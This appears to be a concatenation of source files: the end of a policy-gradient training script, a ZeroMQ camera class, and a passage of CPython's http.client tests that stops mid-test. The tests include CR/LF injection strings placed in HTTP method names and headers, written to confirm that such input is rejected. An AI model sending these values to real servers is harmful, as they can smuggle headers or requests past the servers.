    computation_graph_args = {
        'n_layers': n_layers,
        'ob_dim': ob_dim,
        'ac_dim': ac_dim,
        'discrete': discrete,
        'size': size,
        'learning_rate': learning_rate,
        }
    sample_trajectory_args = {
        'animate': animate,
        'max_path_length': max_path_length,
        'min_timesteps_per_batch': min_timesteps_per_batch,
        }
    estimate_return_args = {
        'gamma': gamma,
        'reward_to_go': reward_to_go,
        'nn_baseline': nn_baseline,
        'normalize_advantages': normalize_advantages,
        }
    agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
    # build computation graph
    agent.build_computation_graph()
    # tensorflow: config, session, variable initialization
    agent.init_tf_sess()
    # Training Loop
    total_timesteps = 0
    for itr in range(n_iter):
        print("********** Iteration %i ************"%itr)
        paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
        total_timesteps += timesteps_this_batch
        # Build arrays for observation, action for the policy gradient update by concatenating
        # across paths
        ob_no = np.concatenate([path["observation"] for path in paths])
        ac_na = np.concatenate([path["action"] for path in paths])
        re_n = [path["reward"] for path in paths]
        q_n, adv_n = agent.estimate_return(ob_no, re_n)
        agent.update_parameters(ob_no, ac_na, q_n, adv_n)
        # Log diagnostics
        returns = [path["reward"].sum() for path in paths]
        ep_lengths = [pathlength(path) for path in paths]
        logz.log_tabular("Time", time.time() - start)
        logz.log_tabular("Iteration", itr)
        logz.log_tabular("AverageReturn", np.mean(returns))
        logz.log_tabular("StdReturn", np.std(returns))
        logz.log_tabular("MaxReturn", np.max(returns))
        logz.log_tabular("MinReturn", np.min(returns))
        logz.log_tabular("EpLenMean", np.mean(ep_lengths))
        logz.log_tabular("EpLenStd", np.std(ep_lengths))
        logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
        logz.log_tabular("TimestepsSoFar", total_timesteps)
        logz.dump_tabular()
        logz.pickle_tf_vars()
def main():
    """Parse CLI arguments and launch one training process per experiment seed."""
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vpg')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--reward_to_go', '-rtg', action='store_true')
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--nn_baseline', '-bl', action='store_true')
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)
    parser.add_argument('--n_layers', '-l', type=int, default=2)
    parser.add_argument('--size', '-s', type=int, default=64)
    args = parser.parse_args()
    # Create the experiment's timestamped log directory under data/.
    if not(os.path.exists('data')):
        os.makedirs('data')
    logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join('data', logdir)
    if not(os.path.exists(logdir)):
        os.makedirs(logdir)
    max_path_length = args.ep_len if args.ep_len > 0 else None
    processes = []
    for e in range(args.n_experiments):
        seed = args.seed + 10*e
        print('Running experiment with seed %d'%seed)
        # Note: train_func closes over `seed`/`logdir`, but the Process is
        # started within the same loop iteration, before `seed` is rebound.
        def train_func():
            train_PG(
                exp_name=args.exp_name,
                env_name=args.env_name,
                n_iter=args.n_iter,
                gamma=args.discount,
                min_timesteps_per_batch=args.batch_size,
                max_path_length=max_path_length,
                learning_rate=args.learning_rate,
                reward_to_go=args.reward_to_go,
                animate=args.render,
                logdir=os.path.join(logdir,'%d'%seed),
                normalize_advantages=not(args.dont_normalize_advantages),
                nn_baseline=args.nn_baseline,
                seed=seed,
                n_layers=args.n_layers,
                size=args.size
                )
        # # Awkward hacky process runs, because Tensorflow does not like
        # # repeatedly calling train_PG in the same thread.
        p = Process(target=train_func, args=tuple())
        p.start()
        processes.append(p)
        # if you comment in the line below, then the loop will block
        # until this process finishes
        # p.join()
    for p in processes:
        p.join()
|
zmq_camera.py | import threading
import traitlets
import sys
import zmq
import numpy as np
import atexit
from .camera import Camera
def recv_image(socket, dtype, shape):
    """Receive one raw frame from *socket* and return it as an ndarray of *shape*.

    The socket payload is interpreted as a flat buffer of *dtype* values; no
    copy beyond the socket read itself is made by frombuffer.
    """
    raw = socket.recv()
    view = memoryview(raw)
    flat = np.frombuffer(view, dtype=dtype)
    return flat.reshape(shape)
class ZmqCamera(Camera):
    # Latest received frame; initialised to a black 224x224 RGB image.
    value = traitlets.Any(value=np.zeros((224, 224, 3), dtype=np.uint8), default_value=np.zeros((224, 224, 3), dtype=np.uint8))

    def __init__(self, *args, **kwargs):
        """Begin receiving frames immediately; the receiver is stopped at interpreter exit."""
        # NOTE(review): super().__init__(*args, **kwargs) is never called here —
        # traitlets-based classes normally require it; confirm this is intentional.
        # self.value = np.zeros((224, 224, 3), dtype=np.uint8) # set default image
        self._running = False
        self._port = 1807                   # ZMQ publisher port on localhost
        self._image_shape = (224, 224, 3)   # expected frame shape (H, W, C)
        self._image_dtype = np.uint8
        self.start()
        atexit.register(self.stop)

    def __del__(self):
        self.stop()

    def _run(self):
        """Receiver loop: subscribe to the local publisher and keep only the newest frame."""
        context = zmq.Context()
        self.socket = context.socket(zmq.SUB)
        self.socket.setsockopt(zmq.CONFLATE, 1) # last msg only.
        self.socket.setsockopt(zmq.SUBSCRIBE, b'') # all topics
        self.socket.connect("tcp://localhost:%d" % self._port)
        while self._running:
            image = recv_image(self.socket, self._image_dtype, self._image_shape)
            self.value = image
        self.socket.close()

    def start(self):
        """Spawn the receiver thread (no-op if already running)."""
        if self._running:
            return
        self._running = True
        self._thread = threading.Thread(target=self._run)
        self._thread.start()

    def stop(self):
        """Signal the receiver loop to finish and wait for its thread to exit."""
        # NOTE(review): _run may stay blocked in socket.recv() and never observe
        # _running == False, so this join() can hang — confirm against real usage.
        if not self._running:
            return
        self._running = False
        self._thread.join()
test_httplib.py | import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase

from test import support

here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')

# constants for testing chunked encoding
# Each chunk is "<hex size>\r\n<payload>\r\n"; concatenated payloads form
# chunked_expected below. Note the final chunk size 0x22 == 34 bytes.
chunked_start = (
    'HTTP/1.1 200 OK\r\n'
    'Transfer-Encoding: chunked\r\n\r\n'
    'a\r\n'
    'hello worl\r\n'
    '3\r\n'
    'd! \r\n'
    '8\r\n'
    'and now \r\n'
    '22\r\n'
    'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
# Variants of the terminating chunk, with an extension and trailer headers.
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"

HOST = support.HOST
class FakeSocket:
    """In-memory socket double: records everything sent and serves *text* as the response."""

    def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
        # Normalise the canned response to bytes.
        self.text = text.encode("ascii") if isinstance(text, str) else text
        self.fileclass = fileclass
        self.data = b''            # everything "sent" through this socket
        self.sendall_calls = 0     # number of sendall() invocations
        self.file_closed = False   # set once the served file's close() runs
        self.host = host
        self.port = port

    def sendall(self, data):
        """Record the outgoing bytes instead of transmitting them."""
        self.sendall_calls += 1
        self.data += data

    def makefile(self, mode, bufsize=None):
        """Serve the canned response as a read-only file object."""
        if mode not in ('r', 'rb'):
            raise client.UnimplementedFileMode()
        # keep the file around so we can check how much was read from it
        self.file = self.fileclass(self.text)
        self.file.close = self.file_close  # nerf close()
        return self.file

    def file_close(self):
        self.file_closed = True

    def close(self):
        pass

    def setsockopt(self, level, optname, value):
        pass
class EPipeSocket(FakeSocket):
    """FakeSocket variant that raises EPIPE when asked to send *pipe_trigger*."""

    def __init__(self, text, pipe_trigger):
        # When sendall() is called with pipe_trigger, raise EPIPE.
        super().__init__(text)
        self.pipe_trigger = pipe_trigger

    def sendall(self, data):
        if self.pipe_trigger in data:
            raise OSError(errno.EPIPE, "gotcha")
        self.data += data

    def close(self):
        pass
class NoEOFBytesIO(io.BytesIO):
    """Like BytesIO, but raises AssertionError on EOF.

    This is used below to test that http.client doesn't try to read
    more from the underlying file than it should.
    """

    def read(self, n=-1):
        chunk = super().read(n)
        if not chunk:
            raise AssertionError('caller tried to read past EOF')
        return chunk

    def readline(self, length=None):
        line = super().readline(length)
        if not line:
            raise AssertionError('caller tried to read past EOF')
        return line
class FakeSocketHTTPConnection(client.HTTPConnection):
    """HTTPConnection that hands out FakeSockets and counts connect() calls."""

    def __init__(self, *args):
        # Counter must exist before any connect() can run.
        self.connections = 0
        super().__init__('example.com')
        # Arguments forwarded verbatim to each FakeSocket we create.
        self.fake_socket_args = args
        self._create_connection = self.create_connection

    def connect(self):
        """Count the number of times connect() is invoked"""
        self.connections += 1
        return super().connect()

    def create_connection(self, *pos, **kw):
        return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
    """Tests for outgoing request-header generation and incoming header
    parsing in http.client."""

    def test_auto_headers(self):
        # Some headers are added automatically, but should not be added by
        # .request() if they are explicitly set.

        class HeaderCountingBuffer(list):
            # Stand-in for HTTPConnection._buffer that counts, per
            # lowercased header name, how many times it was appended.
            def __init__(self):
                self.count = {}
            def append(self, item):
                kv = item.split(b':')
                if len(kv) > 1:
                    # item is a 'Key: Value' header string
                    lcKey = kv[0].decode('ascii').lower()
                    self.count.setdefault(lcKey, 0)
                    self.count[lcKey] += 1
                list.append(self, item)

        for explicit_header in True, False:
            for header in 'Content-length', 'Host', 'Accept-encoding':
                conn = client.HTTPConnection('example.com')
                conn.sock = FakeSocket('blahblahblah')
                conn._buffer = HeaderCountingBuffer()

                body = 'spamspamspam'
                headers = {}
                if explicit_header:
                    headers[header] = str(len(body))
                conn.request('POST', '/', body, headers)
                # Whether supplied explicitly or generated, the header
                # must appear exactly once.
                self.assertEqual(conn._buffer.count[header.lower()], 1)

    def test_content_length_0(self):

        class ContentLengthChecker(list):
            # Captures the value of any Content-Length header appended
            # to the output buffer.
            def __init__(self):
                list.__init__(self)
                self.content_length = None
            def append(self, item):
                kv = item.split(b':', 1)
                if len(kv) > 1 and kv[0].lower() == b'content-length':
                    self.content_length = kv[1].strip()
                list.append(self, item)

        # Here, we're testing that methods expecting a body get a
        # content-length set to zero if the body is empty (either None or '')
        bodies = (None, '')
        methods_with_body = ('PUT', 'POST', 'PATCH')
        for method, body in itertools.product(methods_with_body, bodies):
            conn = client.HTTPConnection('example.com')
            conn.sock = FakeSocket(None)
            conn._buffer = ContentLengthChecker()
            conn.request(method, '/', body)
            self.assertEqual(
                conn._buffer.content_length, b'0',
                'Header Content-Length incorrect on {}'.format(method)
            )

        # For these methods, we make sure that content-length is not set when
        # the body is None because it might cause unexpected behaviour on the
        # server.
        methods_without_body = (
             'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
        )
        for method in methods_without_body:
            conn = client.HTTPConnection('example.com')
            conn.sock = FakeSocket(None)
            conn._buffer = ContentLengthChecker()
            conn.request(method, '/', None)
            self.assertEqual(
                conn._buffer.content_length, None,
                'Header Content-Length set for empty body on {}'.format(method)
            )

        # If the body is set to '', that's considered to be "present but
        # empty" rather than "missing", so content length would be set, even
        # for methods that don't expect a body.
        for method in methods_without_body:
            conn = client.HTTPConnection('example.com')
            conn.sock = FakeSocket(None)
            conn._buffer = ContentLengthChecker()
            conn.request(method, '/', '')
            self.assertEqual(
                conn._buffer.content_length, b'0',
                'Header Content-Length incorrect on {}'.format(method)
            )

        # If the body is set, make sure Content-Length is set.
        for method in itertools.chain(methods_without_body, methods_with_body):
            conn = client.HTTPConnection('example.com')
            conn.sock = FakeSocket(None)
            conn._buffer = ContentLengthChecker()
            conn.request(method, '/', ' ')
            self.assertEqual(
                conn._buffer.content_length, b'1',
                'Header Content-Length incorrect on {}'.format(method)
            )

    def test_putheader(self):
        # Exercise the range of header values putheader() must accept:
        # ints, padded strings, multi-value (folded) headers, and raw
        # bytes including latin-1/utf-8/C1-control octets.
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket(None)
        conn.putrequest('GET','/')
        conn.putheader('Content-length', 42)
        self.assertIn(b'Content-length: 42', conn._buffer)

        conn.putheader('Foo', ' bar ')
        self.assertIn(b'Foo:  bar ', conn._buffer)
        conn.putheader('Bar', '\tbaz\t')
        self.assertIn(b'Bar: \tbaz\t', conn._buffer)
        conn.putheader('Authorization', 'Bearer mytoken')
        self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
        # Multiple values are joined with CRLF + tab (header folding).
        conn.putheader('IterHeader', 'IterA', 'IterB')
        self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
        conn.putheader('LatinHeader', b'\xFF')
        self.assertIn(b'LatinHeader: \xFF', conn._buffer)
        conn.putheader('Utf8Header', b'\xc3\x80')
        self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
        conn.putheader('C1-Control', b'next\x85line')
        self.assertIn(b'C1-Control: next\x85line', conn._buffer)
        conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
        self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
        conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
        self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
        conn.putheader('Key Space', 'value')
        self.assertIn(b'Key Space: value', conn._buffer)
        conn.putheader('KeySpace ', 'value')
        self.assertIn(b'KeySpace : value', conn._buffer)
        conn.putheader(b'Nonbreak\xa0Space', 'value')
        self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
        conn.putheader(b'\xa0NonbreakSpace', 'value')
        self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)

    def test_ipv6host_header(self):
        # Default host header on IPv6 transaction should be wrapped by [] if
        # it is an IPv6 address
        expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
                   b'Accept-Encoding: identity\r\n\r\n'
        conn = client.HTTPConnection('[2001::]:81')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))

        # No port: the Host header must not carry a trailing ':'.
        expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
                   b'Accept-Encoding: identity\r\n\r\n'
        conn = client.HTTPConnection('[2001:102A::]')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))

    def test_malformed_headers_coped_with(self):
        # Issue 19996: a header line with an empty name (': nval') must
        # not break parsing of the surrounding, well-formed headers.
        body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()

        self.assertEqual(resp.getheader('First'), 'val')
        self.assertEqual(resp.getheader('Second'), 'val')

    def test_parse_all_octets(self):
        # Ensure no valid header field octet breaks the parser
        body = (
            b'HTTP/1.1 200 OK\r\n'
            b"!#$%&'*+-.^_`|~: value\r\n"  # Special token characters
            b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
            b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
            b'obs-fold: text\r\n'
            b' folded with space\r\n'
            b'\tfolded with tab\r\n'
            b'Content-Length: 0\r\n'
            b'\r\n'
        )
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.getheader('Content-Length'), '0')
        self.assertEqual(resp.msg['Content-Length'], '0')
        self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
        self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
        vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
        self.assertEqual(resp.getheader('VCHAR'), vchar)
        self.assertEqual(resp.msg['VCHAR'], vchar)
        self.assertIsNotNone(resp.getheader('obs-text'))
        self.assertIn('obs-text', resp.msg)
        # Obsolete line folding: continuation lines are joined onto the
        # preceding header value.
        for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
            self.assertTrue(folded.startswith('text'))
            self.assertIn(' folded with space', folded)
            self.assertTrue(folded.endswith('folded with tab'))

    def test_invalid_headers(self):
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket('')
        conn.putrequest('GET', '/')

        # http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
        # longer allowed in header names
        cases = (
            (b'Invalid\r\nName', b'ValidValue'),
            (b'Invalid\rName', b'ValidValue'),
            (b'Invalid\nName', b'ValidValue'),
            (b'\r\nInvalidName', b'ValidValue'),
            (b'\rInvalidName', b'ValidValue'),
            (b'\nInvalidName', b'ValidValue'),
            (b' InvalidName', b'ValidValue'),
            (b'\tInvalidName', b'ValidValue'),
            (b'Invalid:Name', b'ValidValue'),
            (b':InvalidName', b'ValidValue'),
            (b'ValidName', b'Invalid\r\nValue'),
            (b'ValidName', b'Invalid\rValue'),
            (b'ValidName', b'Invalid\nValue'),
            (b'ValidName', b'InvalidValue\r\n'),
            (b'ValidName', b'InvalidValue\r'),
            (b'ValidName', b'InvalidValue\n'),
        )
        for name, value in cases:
            with self.subTest((name, value)):
                with self.assertRaisesRegex(ValueError, 'Invalid header'):
                    conn.putheader(name, value)
class HttpMethodTests(TestCase):
    """Validation of the HTTP method argument passed to request()."""

    def test_invalid_method_names(self):
        # Method names containing CR/LF could be abused for request
        # smuggling/header injection; each must be rejected up front.
        bad_methods = (
            'GET\r',
            'POST\n',
            'PUT\n\r',
            'POST\nValue',
            'POST\nHOST:abc',
            'GET\nrHost:abc\n',
            'POST\rRemainder:\r',
            'GET\rHOST:\n',
            '\nPUT'
        )
        expected_msg = "method can't contain control characters"
        for bad_method in bad_methods:
            with self.assertRaisesRegex(ValueError, expected_msg):
                connection = client.HTTPConnection('example.com')
                connection.sock = FakeSocket(None)
                connection.request(method=bad_method, url="/")
class BasicTest(TestCase):
    """Core HTTPResponse/HTTPConnection behaviour driven through FakeSocket:
    status lines, framed and unframed bodies, chunked transfer coding,
    header limits, and request sending."""

    def test_status_lines(self):
        # Test HTTP status lines

        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(0), b'')  # Issue #20007
        self.assertFalse(resp.isclosed())
        self.assertFalse(resp.closed)
        self.assertEqual(resp.read(), b"Text")
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

        # A non-integer status code must raise BadStatusLine.
        body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        self.assertRaises(client.BadStatusLine, resp.begin)

    def test_bad_status_repr(self):
        exc = client.BadStatusLine('')
        self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')

    def test_partial_reads(self):
        # if we have Content-Length, HTTPResponse knows when to close itself,
        # the same behaviour as when we read the whole thing with read()
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), b'xt')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_mixed_reads(self):
        # readline() should update the remaining length, so that read() knows
        # how much data is left and does not raise IncompleteRead
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.readline(), b'Text\r\n')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(), b'Another')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_partial_readintos(self):
        # if we have Content-Length, HTTPResponse knows when to close itself,
        # the same behaviour as when we read the whole thing with read()
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        b = bytearray(2)
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'Te')
        self.assertFalse(resp.isclosed())
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'xt')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_partial_reads_no_content_length(self):
        # when no length is present, the socket should be gracefully closed when
        # all data was read
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), b'xt')
        self.assertEqual(resp.read(1), b'')
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_partial_readintos_no_content_length(self):
        # when no length is present, the socket should be gracefully closed when
        # all data was read
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        b = bytearray(2)
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'Te')
        self.assertFalse(resp.isclosed())
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'xt')
        n = resp.readinto(b)
        self.assertEqual(n, 0)
        self.assertTrue(resp.isclosed())

    def test_partial_reads_incomplete_body(self):
        # if the server shuts down the connection before the whole
        # content-length is delivered, the socket is gracefully closed
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), b'xt')
        self.assertEqual(resp.read(1), b'')
        self.assertTrue(resp.isclosed())

    def test_partial_readintos_incomplete_body(self):
        # if the server shuts down the connection before the whole
        # content-length is delivered, the socket is gracefully closed
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        b = bytearray(2)
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'Te')
        self.assertFalse(resp.isclosed())
        n = resp.readinto(b)
        self.assertEqual(n, 2)
        self.assertEqual(bytes(b), b'xt')
        n = resp.readinto(b)
        self.assertEqual(n, 0)
        self.assertTrue(resp.isclosed())
        self.assertFalse(resp.closed)
        resp.close()
        self.assertTrue(resp.closed)

    def test_host_port(self):
        # Check invalid host_port

        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)

        # Valid host:port combinations, including IPv6 literals and
        # missing/empty port (default 80).
        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
                          "fe80::207:e9ff:fe9b", 8000),
                         ("www.python.org:80", "www.python.org", 80),
                         ("www.python.org:", "www.python.org", 80),
                         ("www.python.org", "www.python.org", 80),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
                         ("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
            c = client.HTTPConnection(hp)
            self.assertEqual(h, c.host)
            self.assertEqual(p, c.port)

    def test_response_headers(self):
        # test response with multiple message headers with the same field name.
        text = ('HTTP/1.1 200 OK\r\n'
                'Set-Cookie: Customer="WILE_E_COYOTE"; '
                'Version="1"; Path="/acme"\r\n'
                'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
                ' Path="/acme"\r\n'
                '\r\n'
                'No body\r\n')
        hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
               ', '
               'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
        s = FakeSocket(text)
        r = client.HTTPResponse(s)
        r.begin()
        cookies = r.getheader("Set-Cookie")
        self.assertEqual(cookies, hdr)

    def test_read_head(self):
        # Test that the library doesn't attempt to read any data
        # from a HEAD request.  (Tickles SF bug #622042.)
        sock = FakeSocket(
            'HTTP/1.1 200 OK\r\n'
            'Content-Length: 14432\r\n'
            '\r\n',
            NoEOFBytesIO)
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        if resp.read():
            self.fail("Did not expect response from HEAD request")

    def test_readinto_head(self):
        # Test that the library doesn't attempt to read any data
        # from a HEAD request. (Tickles SF bug #622042.)
        sock = FakeSocket(
            'HTTP/1.1 200 OK\r\n'
            'Content-Length: 14432\r\n'
            '\r\n',
            NoEOFBytesIO)
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        b = bytearray(5)
        if resp.readinto(b) != 0:
            self.fail("Did not expect response from HEAD request")
        self.assertEqual(bytes(b), b'\x00'*5)

    def test_too_many_headers(self):
        # Exceeding the parser's header-count limit must raise.
        headers = '\r\n'.join('Header%d: foo' % i
                              for i in range(client._MAXHEADERS + 1)) + '\r\n'
        text = ('HTTP/1.1 200 OK\r\n' + headers)
        s = FakeSocket(text)
        r = client.HTTPResponse(s)
        self.assertRaisesRegex(client.HTTPException,
                               r"got more than \d+ headers", r.begin)

    def test_send_file(self):
        # A file object body gets a Content-Length derived from the file.
        expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
                    b'Accept-Encoding: identity\r\nContent-Length:')

        with open(__file__, 'rb') as body:
            conn = client.HTTPConnection('example.com')
            sock = FakeSocket(body)
            conn.sock = sock
            conn.request('GET', '/foo', body)
            self.assertTrue(sock.data.startswith(expected), '%r != %r' %
                    (sock.data[:len(expected)], expected))

    def test_send(self):
        # send() must accept bytes, buffer-API objects, and file objects.
        expected = b'this is a test this is only a test'
        conn = client.HTTPConnection('example.com')
        sock = FakeSocket(None)
        conn.sock = sock
        conn.send(expected)
        self.assertEqual(expected, sock.data)
        sock.data = b''
        conn.send(array.array('b', expected))
        self.assertEqual(expected, sock.data)
        sock.data = b''
        conn.send(io.BytesIO(expected))
        self.assertEqual(expected, sock.data)

    def test_send_updating_file(self):
        # A file whose read() returns None mid-stream stops the send at
        # that point; only the data before the None is transmitted.
        def data():
            yield 'data'
            yield None
            yield 'data_two'

        class UpdatingFile():
            mode = 'r'
            d = data()
            def read(self, blocksize=-1):
                return self.d.__next__()

        expected = b'data'

        conn = client.HTTPConnection('example.com')
        sock = FakeSocket("")
        conn.sock = sock
        conn.send(UpdatingFile())
        self.assertEqual(sock.data, expected)

    def test_send_iter(self):
        # An iterable body is sent chunk by chunk after the headers.
        expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
                   b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
                   b'\r\nonetwothree'

        def body():
            yield b"one"
            yield b"two"
            yield b"three"

        conn = client.HTTPConnection('example.com')
        sock = FakeSocket("")
        conn.sock = sock
        conn.request('GET', '/foo', body(), {'Content-Length': '11'})
        self.assertEqual(sock.data, expected)

    def test_send_type_error(self):
        # See: Issue #12676
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket('')
        with self.assertRaises(TypeError):
            conn.request('POST', 'test', conn)

    def test_chunked(self):
        expected = chunked_expected
        sock = FakeSocket(chunked_start + last_chunk + chunked_end)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), expected)
        resp.close()

        # Various read sizes
        for n in range(1, 12):
            sock = FakeSocket(chunked_start + last_chunk + chunked_end)
            resp = client.HTTPResponse(sock, method="GET")
            resp.begin()
            self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
            resp.close()

        # A truncated chunked stream must raise IncompleteRead carrying
        # the data received so far.
        for x in ('', 'foo\r\n'):
            sock = FakeSocket(chunked_start + x)
            resp = client.HTTPResponse(sock, method="GET")
            resp.begin()
            try:
                resp.read()
            except client.IncompleteRead as i:
                self.assertEqual(i.partial, expected)
                expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
                self.assertEqual(repr(i), expected_message)
                self.assertEqual(str(i), expected_message)
            else:
                self.fail('IncompleteRead expected')
            finally:
                resp.close()

    def test_readinto_chunked(self):

        expected = chunked_expected
        nexpected = len(expected)
        b = bytearray(128)

        sock = FakeSocket(chunked_start + last_chunk + chunked_end)
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        n = resp.readinto(b)
        self.assertEqual(b[:nexpected], expected)
        self.assertEqual(n, nexpected)
        resp.close()

        # Various read sizes
        for n in range(1, 12):
            sock = FakeSocket(chunked_start + last_chunk + chunked_end)
            resp = client.HTTPResponse(sock, method="GET")
            resp.begin()
            m = memoryview(b)
            i = resp.readinto(m[0:n])
            i += resp.readinto(m[i:n + i])
            i += resp.readinto(m[i:])
            self.assertEqual(b[:nexpected], expected)
            self.assertEqual(i, nexpected)
            resp.close()

        # Truncated chunked streams raise IncompleteRead, as with read().
        for x in ('', 'foo\r\n'):
            sock = FakeSocket(chunked_start + x)
            resp = client.HTTPResponse(sock, method="GET")
            resp.begin()
            try:
                n = resp.readinto(b)
